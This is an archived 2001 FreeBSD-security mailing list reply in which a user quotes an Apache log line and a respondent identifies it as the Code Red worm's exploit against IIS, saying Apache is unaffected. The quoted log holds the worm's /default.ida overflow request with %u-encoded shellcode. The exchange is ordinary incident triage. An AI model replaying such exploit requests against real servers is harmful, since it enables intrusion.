Date: Sat, 21 Jul 2001 14:18:24 -0700 (PDT) From: "f.johan.beisser" <jan@caustic.org> To: nathan@salvation.unixgeeks.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: possible? Message-ID: <Pine.BSF.4.21.0107211416450.5567-100000@pogo.caustic.org> In-Reply-To: <20010721204942.12010.qmail@salvation.unixgeeks.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On 21 Jul 2001 nathan@salvation.unixgeeks.com wrote: > > okay, today i checked my apache logs this is what i got: > > 195.10.116.2 - - [19/Jul/2001:15:50:20 -0700] "GET /default.ida?NNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u > 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 > 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 332 > > this same exact get request came from several different address as well. such > as: 128.138.105.172, 202.157.154.126, and a couple of others. any ideas? any > remote exploits in apache i've missed? i'm running Apache/1.3.19 Server.. that right there is the "Code Red" exploit for IIS. the worm has been making the rounds for the last couple weeks, and is not an exploit against apache. you're pretty much safe. -- jan -------/ f. johan beisser /--------------------------------------+ http://caustic.org/~jan jan@caustic.org "if my thought-dreams could be seen.. "they'd probably put my head in a gillotine" -- Bob Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.21.0107211416450.5567-100000>